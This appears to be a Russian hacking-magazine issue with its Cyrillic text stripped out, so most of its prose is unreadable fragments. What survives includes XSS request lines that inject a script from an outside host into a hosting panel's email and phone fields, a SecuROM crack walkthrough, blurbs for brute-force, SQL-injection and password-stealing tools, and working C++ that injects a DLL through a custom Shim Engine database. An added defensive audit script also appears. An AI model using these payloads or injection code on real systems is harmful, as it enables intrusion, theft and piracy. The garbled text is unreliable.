, .
html- : js/func.js. ,
,
.
saveNewPass() ID+JS.
, . , , ,
. , (
)? ,
IP
!

, , ,




.

Basic Authentication. ,
. ,
,
, ,
...
IT , .
, ,
:).


, , , - .
, ID, .
. ,

, ,
-. ,
, . ,
.
, : e-mail
?. : + IP. ,
. :
<a href="JavaScript: edit_post(***01, ***1)"
class=z11><font class=z11></font></a>

, 3, ,
! , ,
. , ,
. , ,
. , !
.
,
:
<script language='JavaScript' src='js/hd.js'></script>

, js/hd.js


. showTiket(n).
, .
, ,
. , IP!
,
,
, , : (...) , ,
. ! ,
.

XSS?
, , , . .
, XSS.
, ( ).
,
, , (e-mail,
SMS-)
. , ,
/ , e-mail
.
:
<script src="http://***/o.js" type="text/javascript" >
</script>

,
e-mail. , IE ,
ieHTTPHeaders:
POST /client.php HTTP/1.1
...

xjxfun=saveEmail&xjxr=1328363403426&xjxargs[]=TEST
xjxfun=saveTel&xjxr=1328363361153&xjxargs[]=000000000000
xjxfun=saveSMSTel&xjxr=1328363389834&
xjxargs[]=000000000000

xjxr, GET-,
, . e-mail:
/client.php?xjxfun=saveEmail&xjxargs[]=
<script src="http://***/o.js" type="text/javascript" >
</script>

o.js alert(XSS);. !
.

alert. XSS ?
, .
:
/client.php?xjxfun=saveTel&xjxargs[]=000000000000
<script src="http://***/o.js" type="text/javascript" >
</script>
/client.php?xjxfun=saveSMSTel&xjxargs[]=000000000000
<script src="http://***/o.js" type="text/javascript" >
</script>

! ,
, - . , , , 260 , .


IT- , 2008 .

.
, . ,

,
, . ,
. z
XSS


elf (icq: 7719116)


cj (icq: 3708307)

DVD

SecuROM
v7.33.17
, OllyDbg
-7, Xcode injection
,
, ,




OEP.


-

:

Tiberium Wars
Command & Conquer
Electronic Arts.
Sony Digital Audio Disc Corporation
(SONY DADC), ,
, SecuROM,
.

:


;
SecuROM_7 Profiler
v1.0;

SecuROM 7
& VM;
X-code
injection (txt-bin);
X-code
injection
!

SecuROM
,
(exelab.ru
). ,
Sony ,
Protection Technology
,


,
.
. ,

. ! ,
OEP
. , ,
SecuROM 7.33.
7.3x , (
: <space for rent>
You Are Now Entering a
Restricted Area).
,
.
! !

KeBugCheckEx.

.
, ,

, :).

WHAT IS TARGET
. , Tiberium Wars ( 1.9),
OllyDbg 1.10 OllyDmp
( ) OllyDbg 2.0
- .
,
,
.
, .
.

CNC3.exe: , Microsoft C++ 7.0,
.text, .rdata , ,

. , Daemon
Tools ,

, , .

CnC, , CNC3.exe
WinAPI CreateProcess
.dat (
Microsoft PE EXE format) . ,
\RetailExe\1.9\cnc3game.
dat.
.securom , .
F9
.
,
API-, ProcMon ,


WindowsNT\CurrentVersion\Windows\AppInit.
, ,
. ?
,
, ,
.
, CreateFile, FindWindow
.
;
. ,

.
,
( ).
, (
, , ). .
, CNC3.exe
Microsoft C++ 7.0. ,
cnc3game.dat . :

OEP

. !

: ,
. ,
,
, , ,
(
).
,
,
X- .
, X- ,

.
:
1. On-line patching. WinAPI
ReadProcessMemory/WriteProcessMemory
/
. , ,
NtExplorer
AsPack 2.11c,
. Themida
.
2. Offline patching. .
, ,
.

.
,

GetCommandLine/GetFilePath
.
3. Dll-hijacking. ,
,
(,
DllMain),

.


004626FAh.
004784B8h
, .
, API (GetSystemTimeAsFileTime,
GetCurrentProcessId).
: GetSystemTimeAsFileTime
X-, ,

OEP ,
,
.
SecuROM 7.33
WinAPI,
,
.
! .
.est
asm-,
.

,
HKLM\Software\Microsoft\

004628DA CALL 004784B8
004628DF JMP 004626FA



. :
GetSystemTimeAsFileTime
. ,
( , .text)
, . , ,
kernel32.
text ( ), 2k3
PeTools Write,

! , ,
WinAPI VirtualProtect, .
.

. , large
integer ACSIIZ- ( ltoa
), MessageBox,

WinAPI. ,

CreateThread 00F9AD0E,
. , ,
! -.
. MessageBox
: 00DDCE77, 76B414D4, 7C34207B,
0040A5AE -! ,
.text! We need attach
now! 1.10,
, . ,
OEP (
0040A2C7). ,
(VM) -
, (
SONY DADC) OEP

. ,
? SecuROM v7.33 Virtual Machine,
, !

SECUROM V7 VIRTUAL MACHINE


Sony DADC :
OEP
,
.
, ,
! ,
VM,
,
,
, ,
VM, ,
MOV EAX, 1; CPUID;
MOV AL, CURRENT_CPUID_KEY_
DELTA_DECODE 254 .


LINK
bit.ly/x4iBzF


SecuROM
7.30.


,

,

.

VM

,
VM
.
bit.ly/xG9Lry
NoDVD CnC3:
Tiberium Wars v1.9.

.memory
.

, SONY DADC
!

,
.
VM
,

,
SecuROM v7.3x VM
,
- . :

(LPDWORD VOID) .
.
-, , ,

( spin- JMP EAX),
, , ,
.
.
REP STOS DWORD PTR ES:[EDI]
MOV DWORD PTR DS:[EBX+4],EAX
MOV EAX,DWORD PTR SS:[ESP]
MOV DWORD PTR DS:[EBX+8],EAX
MOV DWORD PTR DS:[EBX+0C],EDX
MOV BYTE PTR DS:[EBX+10],95
MOV DWORD PTR DS:[EBX+14],EBX
MOV DWORD PTR DS:[EBX+1C],ESP

, ,
,
VM. ,
VM 90% ! -, ,
copy/paste. -,
CPU . ,

! , , ROL- (crypt-byte),
,
255
,

. , ,
-
.
VM ?


, !
, .
( 2),
. 2

,
,
.
(, 1),
(offset 00B93AFC), VM. EAX
- (0790A442),
.
(0790A442)
, EAX 1,
,
(offset 00B93AFC). , ,
. ,
VM : -
MOV ECX, DWORD PTR SS:[EBP+8]
MOV ECX, DWORD PTR DS:[ECX]
MOV EAX, DWORD PTR SS:[EBP+0C]
AND EAX, ECX
MOV ECX, EAX

NOP
.
VM, ( ).
1 1.
, ,
VM
WinAPI, ( ,
-,
).
WinAPI , : SetUnhandledExceptionFilter,

SecuROM v7.33.017 , X-

GetModuleFileNameA, DeleteFileA, GlobalFree.


VM CALL EAX,
.

WinAPI. (

10k). :
1. . ,

,
.
!
2. 255 (
1
50),
++ ,
,
VM
(XOR SecretDATA,

43E2AB9D) .
.
1 VM: CALL ANY_OFFSET JMP DWORD
PTR DS:[ ] JMP [VM_VIRTUAL_ADDRESS] VM.

VM .
, JMP DWORD
PTR DS:[ ]
. ,
, VM, ,
(LPDWORD
VOID). VM

!
VM
,
, ,
. , !
, ,
1 1,
3k, 2 30k.

.

,
0044F4D2 DEC DWORD PTR DS:[158297A]
0044F4D8 JE NODVD.00482DE5
00482DE5 MOV DWORD PTR DS:[158297A],18D
00482DEF JMP NODVD.0044F4DE

Sony
DADC. .

OEP ! VM xD


SONY
DADC ( )!
][. z


X-Tools


:
slider
URL:
bit.ly/yMgiB6
:
*nix/win

:
garinn
URL:
ripper.zu8.ru
:
Windows

:
The SX Team
URL:
bit.ly/ht8krs
:
Windows

- ADSL-
BVSCANNER


SQL-

BVScanner (Black Vlastelin Scanner)


,
Perl.

ADSL-.
.
,

accounts.txt.

SQLRipper
,
,
SQL MySQL MSSQL.

:
( :) .

. ? , ,
! Browser Password Decryptor.

: Firefox, Internet
Explorer, Google Chrome, Google Chrome Canary,
Opera Browser, Apple Safari, Flock Browser.

:
perl bvscanner.pl
> IP-
> IP-

, ,

.

:

;
;
PPTP-VPN ,
;
,
,
, .


:

;
;
SQL-;
SELECT c ORDER BY,
GROUP BY, UNION SELECT;
;
IDS;

.dbf;
XML-;
.dbf.
,

(bit.ly/ydHA2o) ,

.

:
command-line GUI- ;

;
;

;
HTML/XML/Text;
Portable,
.
: BrowserPasswordDecryptor.exe
<output_file path>.


:
Mesut Timur
URL:
code.google.com/p/
finddomains
:
*nix/win

FINDDOMAINS
FindDomains
.

, ,
,
, IP-
( ).
FindDomains ,


.
Bing,
-

:
The SX Team
URL:
bit.ly/ihELsw
:
Windows

:
Anton Keks
URL:
angryip.org
:
*nix/win/mac

4
ANGRY IP SCANNER


,
Angry IP Scanner ( ipscan).

IP-
.

,
, MAC-,
.
, (
java) .

NetBIOS ( ,
Windows-),
-, CSV-, TXT- XML- .
,

(, 192.168.0.1 192.168.0.255)

, .
,

.


Bing
Developers. :
binged.it/6Acq5, ID
appid.
txt, .
:
1000 Bing;

DNS;
;
Mono.
:
FindDomains.exe www.google.com

:
s3my0n
URL:
bit.ly/w87YuA
:
*nix/win

5
PE-

PE-.
-
GUI-,
. ExeScan
Python, .


.

, ,
, nonascii/ .
:
PE;
;
API ;
PE ;

.
PEFile
. . : exescan.
py -a <path to exe file.

6
EXPLOIT-DB.COM

,

exploit-db.com.
getsploits (,
) !
/
-/
,
.
:
o: ;
q: ;
h: .
:
--author: ;
--platform: ( 47 );
--type:
--osvdb: OSVDB- ;
--cve: CVE- .
:
getsploits.py -o linux_shellcode.txt
--type shellcode
getsploits.py -o freebsd_x86-64_local.
txt --platform 10
getsploits.py --author maxe vbulletin


MALWARE

(drobotun@xakep.ru)


? . , :

drive-by
,



(

).
!


:



NDIS-, Avast


,
.
. ,
,
.
, ?
,
?
,
. , ,
,
. , ,

, ,
, .
, . ,

, , ( ,

).

:) .
,
, ,
.

, .

: , , ,
. ,
, ,

, .

IoCreateDevice DrWeb, TdiRegisterDeviceObject tdi.sys



Windows .
ws_32.dll,
Winsock (send, recv,
connect ). (
) ,
,
,
.
-
,
,
, -, ws_32.dll,
, ,

.
ws_32.dll afd.sys
(Ancillary Function Driver for WinSock ),

( ,
). ,
ws_32.dll afd.sys. ,
afd.sys ws_32.dll
msafd.dll .
,
,
afd.sys, .
,
tcpip.sys,
tcp/ip.
( ) TDI
(Transport Data Interface ). ,
, nwlnkipx.sys, ipx.

inf- klim6.sys


NDIS- Comodo () OutPost FireWall Pro 7.0 ()


\Device\RawIp, \Device\Udp \
Device\Tcp ( IPv6 \Device\
RawIp6, \Device\Udp6, \Device\Tcp6 ).
IoAttachDevice,
,
IoCreateDevice ,
.
. ,

, Dr.Web,
tcpip.
sys.

TdiRegisterDeviceObject tdi.sys, .
, ,
NDIS (Network Driver Interface
Specification
).

BHO Internet Explorer


,
, NDIS-, ,
.

. .
( Microsoft )
NDIS Intermediate Driver
( NDIS).
( ) , ndis.sys.
Filter Hook Driver (
) kernelmode ,
IP. Microsoft


. -

, -
.



(, ,
,
, -
).

,
,
, .
NDIS- :
, Windows XP,
(NDIS 5),
NDIS- Windows
Vista (NDIS 6).

-. ,
,
,
, NDIS. ,

, ,

. : ,
, ,
(
),
( ).
-
,

, ,
inf- -


.
- inf-
: -,

, -, . ,
, , .

NDIS- ,
,
NDIS-.
, ,

NdisOpenAdapter NdisRegisterProtocol.
,
, , . ,
, Comodo,

NDIS- NdisOpenAdapter, NdisRegisterProtocol,
NdisCloseAdapter NdisDeregisterProtocol.

NdisOpenAdapter,
.
, - ,
.



, NDIS, .

, - java-
(
drive-by

Java- http-


,


,
) .


. BHO
(Browser Helper Object
). BHO
dll-, Internet
Explorer. , BHO

, .
BHO , ,
- .
, , , BHO Internet
Explorer? -,
. -,
( ) ,
,

.

-

, ,
,
.
, -
Java-, -
.
,
, ,
.
-
, ,
.
, ,
,
-,
,
,
.

( ). , html- , iframe (,


).
(
),

Java- Trojan-Downloader.Js.Agent.
ghd (, , )

WWW
NDIS
vitki.net/
ru/story/vvedenie-vndis ( )
msdn.microsoft.
com/en-us/library/
ff564881 ()

DVD



.

Java- ,

. ,
iframe .
,
,

.
Java- ,
DLL- jscript.dll.
%windir%\system32, COM- IE JS. Windows GUID ( )
COM-
Jscript. {f414c260-6ac0-11cfb6d1-00aa00bbbb58}, {f414c261-6ac0-11cfb6d1-00aa00bbbb58} {f414c262-6ac0-11cfb6d1-00aa00bbbb58}.
, ,

JavaScript. ,
jscript.dll.
,
.
,
, ,
JavaScript- Windows.

ntdll.dll, SandboxIE
( SbieDLL.dll)


. ,
,
.
,
.
.



.

. ,


.


. , ,
,
.
,
.
,
. -






, (SandboxIE,
BufferZone,
Kaspersky Internet Security, Comodo Internet
Security Pro, Avast Internet Security).


,
.
,
- .


. Windows User
Account Control (
Windows).
, ,

SandboxIE.

,
, ( ).
.
,

. ,

/ - ,
- , .
,


.
,
, , -


. , SandboxIE
56 ntdll.dll, 68
user32.dll, 71 advapi32.dll, 6 kernel32.dll 1 ws_32.dll.

, .

.



, .
SandboxIE, BufferZone.


SandboxIE

.
( Kaspersky
Internet Security Comodo Internet Security
Pro).
,

.


.

. , SandboxIE
( ) ,
.

Comodo Internet
Security

.

.

,
,
- ,

, . ,
, - ,

,
. z

SandboxIE ( drive , )

INFO



, ,
-
.
,

.
,
,


.
-. Microsoft Security Essential
DSS (Dynamic Signature
Service).
( ,
),
, ,

Microsoft DSS, SpyNet MRS (Microsoft Reputation Services).
, ,


, .

, ,
.
Comodo
,

.

,
Kaspersky Security Network. KSN ,

-,
. KSN

-,
, (

) -,
KSN -.



,

. ,

, :
Program
Files, Windows,
Users\%AllUsersProfile%\Program
Data, Documents
and Setting
HKLM\
Software.

Java-

JavaScript:

][
2011 .


MALWARE

deeonis (deeonis@gmail.com)

,
,
. ,
.
,
,
.

,

. , ,
, .
,

,
.
,

,
.
, . : Kaspersky CRYSTAL, Dr.Web Security
Space, ESET NOD32 Smart Security 5 Avira Free
Antivirus.
(, , )
.

Avira ,

-


.
,

IE6,
web-.


Windows XP sp3 ,
,

,
.

,
.

.
-
-
hex-
.
swf-, Visual Basic Script,
Java-, exe-

( UPX) lpe, pdf,


zip-. .

.

.
, , .
.
,
. ,
.


, ,
, .
, Avira Free Antivirus.
,
,

,
.


Dr.Web

Kaspersky : total detection

, ,
.
,
.
. ,

Scan.
, ,
.
Avira , DR/
Delphi.Gen. ,

,
. , , ,
. 1/10 , ,
- .
Dr.Web Security Space.

. ,
, .
DR/Delphi.Gen,
Trojan.MulDrop.20121. ,

,
. 20121, ,
,
20992 .
,


, ,
, .
.

pdf,
(Exploit.PDF.2633),
Flash Exploit.SWF.193. ,
swf-,
.
,
- ,
. Avira Free
Antivirus ,
(, ,
).
,
. Trojan.
MulDrop.20121
.
, Dr.Web
, , ,

. Kaspersky
CRYSTAL. , ,
,
.

,
.
, ,
,
.
DR/Delphi.Gen,

(HEUR:Trojan.Win32.
Generic). -
. pdf-,
,
HEUR:Exploit.Script.Generic. ,
,
,
, .
,
,
,
2/10.
NOD32.

. , , ,
exe-,
.
Win32/Injector.FP. ,
, ,
: 1 10
.


, ,
,
.

. , ,


NOD32 Avira

Avira Free Antivirus

NOD32

. ,
,

. ,
Avira pdf-,
,
. JS, ,

, HTML/Dlcr.
Dawn.C.2. exe, swf-
.
Avira Free Antivirus .
Dr.Web. ,
.
:
,
Trojan.SMSSend.1950. .
.
,
,
-

,
.
Kaspersky Crystal ,

,

. ,
, , ,

.
ESET NOD32 , . ,
, exe-,
.

.

Avira ESET ( ,
,
).

, ,

600%
,
.
, 10/10
. ,
( ),

.
Dr.Web
:
.
,
, .
-,

. z

,
,
,
.

?
,
.

, .
.
VBS,
. ,
, , CVE201-0611. -, ,
JS, .
winlocker' , ,


.
,
, .
,
( -
).
PDF-,
- drive-by . ,
,
, flash-,
.


Preview

088

TRUE-

,
.

TrueCrypt,
.
,
,
.

,
. ,
- .

084

SHIM:
. Shim Engine,
.

UNIXOID

106


Linux
2.6
sysfs.
?

SYN\ACK

122


HOWTO:

Samba.


111


Android ,
firmware
CyanogenMod MIUI.

FERRUM

128


Microsoft
. 2012.

139


, ,
.
.


TSS (TSS_TSS@mail.ru)

SHIM:

SHIM ENGINE


, dll,
dll redirection, ,
apc LoadLibrary. ,
. ? .

SHIM ?
Shim Engine
Windows , dll, PE-
ntdll.dll.


:
some.exe
Windows95
Windows 95

? , ,
dll ,
- . -


some.exe.
Windows
API.
,
PEB,
Heap Managera.
, , ,
ADVAPI32.DLL:
RegConnectRegistryA, RegConnectRegistryW, RegOpenKeyExA,
RegOpenKeyExW, RegQueryValueExW,RegCloseKey,
RegOpenKeyW, RegQueryValueA, RegQueryValueW,
RegCreateKeyA, RegCreateKeyW, RegCreateKeyExA,
RegCreateKeyExW, RegEnumValueA, RegEnumValueW,
RegEnumKeyA, RegEnumKeyW, RegEnumKeyExA, RegEnumKeyExW,
RegQueryInfoKeyA, RegQueryInfoKeyW, RegSetValueExA,
RegSetValueExW, RegDeleteKeyA, RegDeleteKeyW


EMET

, Shim Engine ,
.

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\
CurrentVersion\AppCompatFlags\Layers]
"C:\\Documents and Settings\\Admin\\ \\test.
exe"="WIN2000"


,
.
SHIMENG_DEBUG_LEVEL 4
(
).
(
, test.exe)
, , Windows 2000 WinDbg,
. , :
[INFO] [SeiSetLayerEnvVar] Env var set __COMPAT_LAYER="Win2000"
...
[INFO] [SE_DllLoaded] INIT. loading DLL "AcLayers.DLL".
...
[MSG ] [SeiInit] Shim DLL 0x71660000 "C:\WINDOWS\AppPatch\
AcLayers.DLL" loaded
[MSG ] [SeiInit] Using SHIM "Win2000VersionLie!AcLayers.DLL"
...
[INFO] [SeiInit] GetHookAPIs returns 3 hooks for DLL "C:\
WINDOWS\AppPatch\AcLayers.DLL" SHIM "Win2000VersionLie"
[MSG ] [SeiInit] Using SHIM "VirtualRegistry!AcLayers.DLL"
[MSG ] [SeiInit] Command line for Shim "VirtualRegistry" :
"WIN2K"
[INFO] [SeiInit] GetHookAPIs returns 27 hooks for DLL "C:\
WINDOWS\AppPatch\AcLayers.DLL" SHIM "VirtualRegistry"
[MSG ] [SeiInit] Using SHIM "DuplicateHandleFix!AcLayers.DLL"
[INFO] [SeiInit] GetHookAPIs returns 1 hooks for DLL "C:\
WINDOWS\AppPatch\AcLayers.DLL" SHIM "DuplicateHandleFix"
[INFO] [SE_DllLoaded] INIT. loading DLL "AcGenral.DLL".
...
[MSG ] [SeiInit] Using SHIM "LoadLibraryCWD!AcGenral.DLL"
[INFO] [SeiInit] GetHookAPIs returns 0 hooks for DLL "C:\
WINDOWS\AppPatch\AcGenral.DLL" SHIM "LoadLibraryCWD"
[MSG ] [SeiInit] Using SHIM "Win2kPropagateLayer!AcLayers.DLL"
[INFO] [SeiInit] GetHookAPIs returns 3 hooks for DLL "C:\
WINDOWS\AppPatch\AcLayers.DLL" SHIM "Win2kPropagateLayer"

, Win2000,
shim dll C:\WINDOWS\ AppPatch\ AcLayers.DLL.
,
Vir tualRegistr y, DuplicateHandleFix ,
( ,
).
:


, , test.exe Win2000. , ,
. .
,
(!) .
. , , .
AppCompatFlags . .


, , Shim Engine shimeng.dll apphelp.dll, sysmain.
sdb drvmain.sdb ( \WINDOWS\AppPatch),
dll ,
PE-
Windows. , ntdll.dll. ,
, ,
Shim Engine, ,
apc-.

PE-:
_LdrpInitializeProcess:
.text:7C921B36 mov eax, large fs:18h ; TEB
.text:7C921B3C mov ebx, [eax+30h] ; PEB
...
.text:7C921B62 lea eax, [ebx+1E8h] ; peb->pShimData
.text:7C921B68 mov ecx, [eax]
...
.text:7C921B87 mov [ebp+var_104], ecx
...
loc_7C921693:
...
.text:7C921693 mov edi, [ebp+var_104]
.text:7C921699 xor esi, esi
.text:7C92169B cmp edi, esi
.text:7C92169D jz loc_7C923CD0
; ULONG peb->pShimData == 0,
; (
; )
.text:7C9216A3 push edi
.text:7C9216A4 push [ebp+var_D8]
.text:7C9216AA mov [ebx+1ECh], esi
.text:7C9216B0 push edi
.text:7C9216B1 call _LdrpLoadShimEngine@12 ;

LdrpLoadShimEngine
shimeng.dll.
LdrpLoadShimEngine dll,
(LdrpGetShimEngineInterface),
(SdbInitDatabase), (SdbUnpackAppCompatData)
. , shimeng.dll. dll ,
, -
, ,
? . (IdaPython):
import idaapi
import idautils
import idc
def EnumStrings():
    # Enumerate both C and Unicode strings found in the loaded database
    s = idautils.Strings( False )
    s.setup( strtypes = idautils.Strings.STR_UNICODE | idautils.Strings.STR_C )
    for i, v in enumerate( s ):
        if v is None:
            print( "Failed on %d" % i )
        else:
            print( "%x => %s" % ( v.ea, str( v ) ) )
print "Script Started..."
EnumStrings()
print "Script Ended..."

idautils.Strings(False)
True, , default_setup = False setup .
IDA ,
:
5d0749b0 -> \Registry\Machine\Software\Microsoft\Windows
NT\CurrentVersion\AppCompatFlags\InstalledSDB

xref SdbResolveDatabase, DatabasePath


DatabaseType. , ( !) ,
GUID ( ,
).
, {GUID} (DatabasePath
DatabaseType)
.

WinDbg

, , , , .
, , , .
, - ?
, !
- ,
, . , , EMET (goo.gl/9Dn5L). ,
Process Monitor ,
, EMET, C:\Program Files\EMET\EMET_GUI.exe, Configure Apps,
test.exe, EMET.
, EMET C:\WINDOWS\AppPatch\Custom\{f8c4cc07-6dc4-418f-b72b-304fcdb64052}.sdb,
dll C:\WINDOWS\AppPatch\EMET.dll.
. SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\\test.exe , ,
SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\{f8c4cc07-6dc4-418f-b72b-304fcdb64052}.
, Layers, Custom. .
hex-, emet.dll test.dll. test.dll C:\WINDOWS\AppPatch\. test.exe
, test.dll test.exe.
vmmap (goo.gl/SsSQn)
. test.exe vmmap dll, mission
complete!


Shim:


, ,
dll ( ,
. ):
#include <windows.h>
#include <iostream>

#define GUID L"{f8c4cc07-6dc4-418f-b72b-304fcdb64052}"
#define SHIM_REGKEY L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags"

BOOL RegisterShimDll()
{
    HKEY key;
    BOOL funcResult = FALSE;
    wchar_t dbPath[] = L"C:\\Windows\\AppPatch\\Custom\\"
        GUID L".sdb";
    DWORD dbType = 0x10000;
    DWORD64 sdb = 0x1cc8828b2208e82;
    // Custom AppCompatFlags
    RegCreateKeyEx(HKEY_LOCAL_MACHINE,
        SHIM_REGKEY L"\\Custom", 0, NULL,
        REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL,
        &key, NULL);
    RegCloseKey(key);
    //
    RegCreateKeyEx(HKEY_LOCAL_MACHINE,
        SHIM_REGKEY L"\\Custom\\test.exe",
        0, NULL, REG_OPTION_NON_VOLATILE,
        KEY_WRITE, NULL, &key, NULL);
    RegSetValueEx(key, GUID L".sdb", 0,
        REG_QWORD, (PBYTE)&sdb, sizeof(DWORD64));
    RegCloseKey(key);
    RegCreateKeyEx(HKEY_LOCAL_MACHINE,
        SHIM_REGKEY L"\\InstalledSDB",
        0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL,
        &key, NULL);
    RegCloseKey(key);
    RegCreateKeyEx(HKEY_LOCAL_MACHINE,
        SHIM_REGKEY L"\\InstalledSDB\\" GUID,
        0, NULL, REG_OPTION_NON_VOLATILE,
        KEY_WRITE, NULL, &key, NULL);
    RegSetValueEx(key, L"DatabasePath", 0,
        REG_SZ, (BYTE*)dbPath, sizeof(dbPath));
    RegSetValueEx(key, L"DatabaseType", 0, REG_DWORD,
        (PBYTE)&dbType, sizeof(DWORD));
    RegCloseKey(key);
    return TRUE;
}

BOOL CopyShimFiles()
{
    CreateDirectory(L"C:\\Windows\\AppPatch\\Custom", NULL);
    CopyFile( GUID L".sdb",
        L"C:\\Windows\\AppPatch\\Custom\\" GUID L".sdb",
        TRUE );
    CopyFile( L"test.dll",
        L"C:\\Windows\\AppPatch\\test.dll", TRUE );
    return TRUE;
}

int main()
{
    CopyShimFiles();
    RegisterShimDll();
    std::cout << "Shim inject complete... " << std::endl;
    std::cout << "Run test.exe and use vmmap.exe to see "
                 "test.dll in AP test.exe" << std::endl;
    return 0;
}

SHIMENG.DLL
shimeng.dll :
SE_DllLoaded dll;
SE_DllUnloaded dll;
SE_DynamicShim ;
SE_GetProcAddress GetProcAddress;
SE_InstallAfterInit
;
SE_InstallBeforeInit ,
;
SE_IsShimDll dll;
SE_ProcessDying ,
, dll
DLL_PROCESS_DETACH.

shim engine ,
.
-, .
-, , , explorer.exe,
.
-,
,
. z
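
Added example (not part of the original article): a defender-side audit of the two registry locations the code above writes, AppCompatFlags\Custom\<exe> and AppCompatFlags\InstalledSDB\{GUID}. It parses the text of a `reg export` (already decoded to a string); the sample export, the function names and the assumption that %SystemRoot% is C:\Windows are constructed for illustration.

```python
import re

# Constructed sample (not from a real host): decoded text of a `reg export`
# of HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\test.exe]
"{f8c4cc07-6dc4-418f-b72b-304fcdb64052}.sdb"=hex(b):82,8e,20,b2,28,88,cc,01

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\calc.exe]
"{11111111-2222-3333-4444-555555555555}.sdb"=hex(b):00,00,00,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f8c4cc07-6dc4-418f-b72b-304fcdb64052}]
"DatabasePath"="C:\\Windows\\AppPatch\\Custom\\{f8c4cc07-6dc4-418f-b72b-304fcdb64052}.sdb"
"DatabaseType"=dword:00010000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}]
"DatabasePath"="C:\\Users\\Public\\x.sdb"
"DatabaseType"=dword:00010000
'''

BASE = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags"
# Assumption: %SystemRoot% is C:\Windows on the audited host.
EXPECTED_DIR = "c:\\windows\\apppatch\\custom\\"
GUID_RE = re.compile(r"\{[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\}")


def parse_reg(text):
    """Return {lowercased key path: {value name: raw value text}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
        elif current is not None and line.startswith('"'):
            m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
            if m:
                current[m.group(1)] = m.group(2)
    return keys


def reg_string(raw):
    """Decode a quoted REG_SZ value from .reg syntax, or None if absent."""
    if raw and len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1].replace("\\\\", "\\")
    return None


def _path_note(path):
    if path is None:
        return ["DatabasePath missing"]
    if not path.lower().startswith(EXPECTED_DIR):
        return ["database outside AppPatch\\Custom"]
    return []


def audit_shims(text):
    """List every custom shim binding and every installed SDB for review."""
    keys = parse_reg(text)
    custom_prefix = (BASE + "\\Custom\\").lower()
    sdb_prefix = (BASE + "\\InstalledSDB\\").lower()
    installed = {k[len(sdb_prefix):]: reg_string(v.get("DatabasePath"))
                 for k, v in keys.items() if k.startswith(sdb_prefix)}
    findings, referenced = [], set()
    for key, values in keys.items():
        if not key.startswith(custom_prefix):
            continue
        exe = key[len(custom_prefix):]
        for name in values:
            m = GUID_RE.search(name)
            if not m:
                continue
            guid = m.group(0).lower()
            referenced.add(guid)
            if guid in installed:
                notes = _path_note(installed[guid])
            else:
                notes = ["no InstalledSDB entry"]
            findings.append({"exe": exe, "guid": guid,
                             "path": installed.get(guid), "notes": notes})
    # Databases registered system-wide but not tied to a Custom\<exe> key.
    for guid, path in installed.items():
        if guid not in referenced:
            findings.append({"exe": None, "guid": guid, "path": path,
                             "notes": ["not bound to any executable"] + _path_note(path)})
    return findings


if __name__ == "__main__":
    for finding in audit_shims(SAMPLE_REG):
        print(finding)
```

An empty notes list only means the registration is internally consistent; the test.exe entry from the article would appear that way, so every listed binding still needs to be matched against software known to install shim databases.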


Johnny Catch (johnny.catch@gmail.com)

TRUE


TRUECRYPT
, -
,
TrueCrypt.
,
,


. ,
.
TrueCrypt
, ,
.

, .
,
, .
,
. ,
TrueCrypt.

TrueCrypt


, , .
,
truecrypt.org (
7.0a). MS Visual Studio 2010 ( ,


True-

.
128 128, 192 256 . 256- .

TrueCrypt :
,
,
.
BelT :
void belt_init(unsigned __int8 * k, int kLen,
               unsigned __int8 * ks)
{
    int i;
    for (i = 0; i < 32; ++i) ks[i] = k[i];
}

BelT

MS VS 2008 SP1). 16-


Microsoft, MS Visual C++
1.52. MSDN,
:). , 16-
,

- .
, Visual C++ 1.52
.
NASM, gzip, WinDDK, PKCS#11 ( RSA Data Security).
,
.
:
1. MSVC16_ROOT , MSVC15,
Microsoft Visual C++ 1.52;
2. WINDDK_ROOT , , WinDDK;
3. PKCS11_INC , PKCS#11.
PATH, exe NASM gzip. .
PATH
, C:\ gzip.exe. , . ,
TrueCrypt: ,
Visual Studio ( ), All Build. ,
Release TrueCrypt.
.


BelT,


,
, ,
(
TrueCrypt MAX_KEY_LENGTH
key schedule ,
TrueCrypt).
belt_init .
-, ,
32 , kLen ( assert).

. Cold
Boot Attack,

,
.
(
). ,
:
// (SBox)
unsigned __int8 H[256] = {...};
//
unsigned int KeyIndex[8][7] = {...};

H , ( 34.101.31-2011), . :
#define HU1(x,H) (((unsigned __int32) (H)[ U1((x)) ]) << 24)
#define HU2(x,H) (((unsigned __int32) (H)[ U2((x)) ]) << 16)
#define HU3(x,H) (((unsigned __int32) (H)[ U3((x)) ]) << 8)

XTS
XTS
TrueCrypt. ,
XEX, 2003
. , XEX
,
XTS . 2010 XTS
NIST
. 2007
IEEE (IEEE 1619). XTS
.



#define HU4(x,H) (((unsigned __int32) (H)[ U4((x)) ]))
#define G(x,H,r) RotHi(HU4((x),(H)) | HU3((x),(H)) \
| HU2((x),(H)) | HU1((x),(H)),(r))

HU
DWORD, G
. (
).
:
void belt_encrypt
(
unsigned __int8 *ks,
unsigned __int8 * inBlock,
unsigned __int8 * outBlock
);

.
DWORD,

, , . BelT
28147-89.

TrueCrypt.

TRUECRYPT
